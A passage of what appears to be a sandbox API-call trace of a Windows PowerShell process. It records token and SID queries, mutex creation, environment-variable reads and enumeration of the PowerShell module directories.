TokenInformation=0x25b73984af0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984af0, ReturnLength=0x653ef8d6b8) returned 1 [0280.977] LocalFree (hMem=0x25b73984af0) returned 0x0 [0280.978] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c6e0f90, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c6e0f90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0280.978] CreateMutexW (lpMutexAttributes=0x25b5c6e10e0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x4fc [0280.978] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x4fc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0280.978] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0280.978] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.978] CoTaskMemFree (pv=0x25b73d007a0) [0280.978] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0280.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0280.979] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c6e1788 | out: lpFileInformation=0x25b5c6e1788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0280.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0280.979] ReleaseMutex (hMutex=0x4fc) returned 1 [0280.979] CoCreateGuid (in: pguid=0x653ef8d6c8 | out: pguid=0x653ef8d6c8*(Data1=0x23edb2ea, Data2=0x3ea3, Data3=0x4824, Data4=([0]=0xb0, [1]=0x10, [2]=0x73, [3]=0x92, [4]=0x9, [5]=0x94, [6]=0xe6, [7]=0x3))) returned 0x0 [0280.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f8 [0280.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x938 [0280.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x93c [0280.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x940 [0280.980] SetEvent (hEvent=0x940) returned 1 [0280.980] SetEvent (hEvent=0x4f8) returned 1 [0280.980] SetEvent (hEvent=0x938) returned 1 [0280.980] SetEvent (hEvent=0x93c) returned 1 [0280.981] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x944 [0280.981] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.981] EtwEventActivityIdControl () returned 0x0 [0280.981] EtwEventActivityIdControl () returned 0x0 [0280.981] EtwEventActivityIdControl () returned 0x0 [0280.986] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0280.986] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0280.986] CoTaskMemFree (pv=0x25b73cfd8e0) [0280.986] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0280.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0280.987] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0280.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0280.989] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0281.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.001] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.002] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff480 [0281.002] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73cff480, nSize=0x105 | out: lpBuffer="") returned 0x97 [0281.002] CoTaskMemFree (pv=0x25b73cff480) [0281.002] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0281.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.002] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0281.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.005] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0281.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.018] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0281.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccd0) returned 1 [0281.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cdb0 | out: lpFileInformation=0x653ef8cdb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0281.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc90) returned 1 [0281.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.019] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.019] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.020] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.020] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.020] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.020] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.020] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0281.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0281.021] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.021] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.021] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0281.022] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0281.022] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0281.022] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0281.022] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0281.023] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb10) returned 1 [0281.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cad0) returned 1 [0281.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.023] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.024] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.024] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.024] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.024] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.025] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0281.025] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 